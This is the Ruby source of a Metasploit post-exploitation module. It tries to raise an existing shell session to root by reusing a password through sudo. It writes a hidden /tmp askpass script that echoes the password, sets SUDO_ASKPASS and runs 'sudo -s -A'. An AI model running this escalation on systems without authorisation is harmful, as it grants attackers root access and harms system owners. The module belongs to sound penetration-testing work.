Path: blob/master/modules/post/multi/manage/sudo.rb
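##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post module that tries to turn an existing shell session into a UID 0 shell
# by running sudo, optionally feeding it a password through SUDO_ASKPASS.
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::FileDropper

  # Declares the module metadata and the optional PASSWORD option.
  #
  # @param info [Hash] metadata merged into the defaults via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Multiple Linux / Unix Post Sudo Upgrade Shell',
        'Description' => %q{
          This module attempts to upgrade a shell account to UID 0 by reusing the
          given password and passing it to sudo. This technique relies on sudo
          versions from 2008 and later which support -A.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'todb <todb[at]metasploit.com>',
          'Ryan Baxendale <rbaxendale[at]gmail.com>' # added password option
        ],
        'Platform' => %w[aix linux osx solaris unix],
        'References' => [
          # Askpass first added March 2, 2008, looks like
          [ 'URL', 'http://www.sudo.ws/repos/sudo/file/05780f5f71fd/sudo.h']
        ],
        'SessionTypes' => [ 'shell' ]
      )
    ) # Need to test 'meterpreter'

    register_options(
      [
        OptString.new('PASSWORD', [false, 'The password to use when running sudo.'])
      ]
    )
  end

  # Run Method for when run command is issued.
  #
  # Fails on meterpreter sessions, returns early when the session is already
  # root or `which sudo` prints nothing, and otherwise calls get_root.
  def run
    if session.type == 'meterpreter'
      fail_with(Failure::BadConfig, 'Meterpreter sessions cannot be elevated with sudo')
    end

    print_status('SUDO: Attempting to upgrade to UID 0 via sudo')
    sudo_bin = cmd_exec('which sudo')
    if is_root?
      print_status 'Already root, so no need to upgrade permissions. Aborting.'
      return
    end
    if sudo_bin.empty?
      print_error 'No sudo binary available. Aborting.'
      return
    end
    get_root
  end

  # Picks the password (module option first, then the originating exploit's
  # datastore), runs sudo through askpass_sudo, and records a
  # 'host.escalation' note when is_root? reports success afterwards.
  def get_root
    password = datastore['PASSWORD'] || session.exploit_datastore['PASSWORD']

    if password.to_s.empty?
      print_status 'No password available, trying a passwordless sudo.'
    else
      # The credential is deliberately not echoed: console output is commonly
      # spooled or logged, which would leave the password in cleartext there.
      print_status 'Sudoing with the supplied password.'
    end
    askpass_sudo(password)
    if is_root?
      print_good 'SUDO: Root shell secured.'
      report_note(
        host: session,
        type: 'host.escalation',
        data: "User `#{session.exploit_datastore['USERNAME']}' sudo'ed to a root shell"
      )
    else
      print_error "SUDO: Didn't work out, still a mere user."
    end
  end

  # Runs sudo in the session. With no password it runs a plain `sudo -s`;
  # otherwise it writes a temporary SUDO_ASKPASS helper that prints the
  # password and runs `sudo -s -A`. Errors are reported, never raised.
  #
  # @param password [String, nil] password handed to sudo; empty/nil means
  #   a passwordless attempt
  #
  # TODO: test on more platforms
  def askpass_sudo(password)
    if password.to_s.empty?
      begin
        ::Timeout.timeout(30) do
          cmd_exec('sudo -s')
        end
      rescue ::Timeout::Error
        print_error 'SUDO: Passwordless sudo timed out. Might be blocking.'
      rescue StandardError
        print_error 'SUDO: Passwordless sudo failed. Check the session log.'
      end
    else
      askpass_sh = "/tmp/.#{Rex::Text.rand_text_alpha(7)}"
      # The password lands inside a single-quoted shell string. Rewrite each
      # embedded ' as '\'' so a quote in the password cannot end the literal
      # and have the remainder interpreted as shell syntax.
      quoted_password = password.to_s.gsub("'") { "'\\''" }
      begin
        # Telnet can be pretty pokey, allow about 20 seconds per cmd_exec
        # Generally will be much snappier over ssh.
        # Need to timeout in case there's a blocking prompt after all
        ::Timeout.timeout(120) do
          # Queue the path for cleanup before anything is written, so the
          # credential file is still scheduled for removal if a later step
          # raises or the timeout fires.
          register_file_for_cleanup(askpass_sh)
          # Create the shell script that will pass the password to sudo
          vprint_status "Writing the SUDO_ASKPASS script: #{askpass_sh}"
          write_file(askpass_sh, "#!/bin/sh\necho '#{quoted_password}'\n")
          vprint_status 'Setting executable bit.'
          # Owner-only mode: the script holds a cleartext password, so it
          # should not stay readable by other local accounts.
          # NOTE(review): the file still has its creation mode between
          # write_file and this chmod - confirm the session umask if that
          # window matters.
          cmd_exec("chmod 700 #{askpass_sh}")
          vprint_status 'Setting environment variable.'

          # Bruteforce the set command. At least one should work.
          cmd_exec("setenv SUDO_ASKPASS #{askpass_sh}")
          cmd_exec("export SUDO_ASKPASS=#{askpass_sh}")
          vprint_status 'Executing sudo -s -A'
          cmd_exec('sudo -s -A')
        end
      rescue ::Timeout::Error
        print_error 'SUDO: Sudo with a password timed out.'
      rescue StandardError
        print_error 'SUDO: Sudo with a password failed. Check the session log.'
      end
    end
  end
end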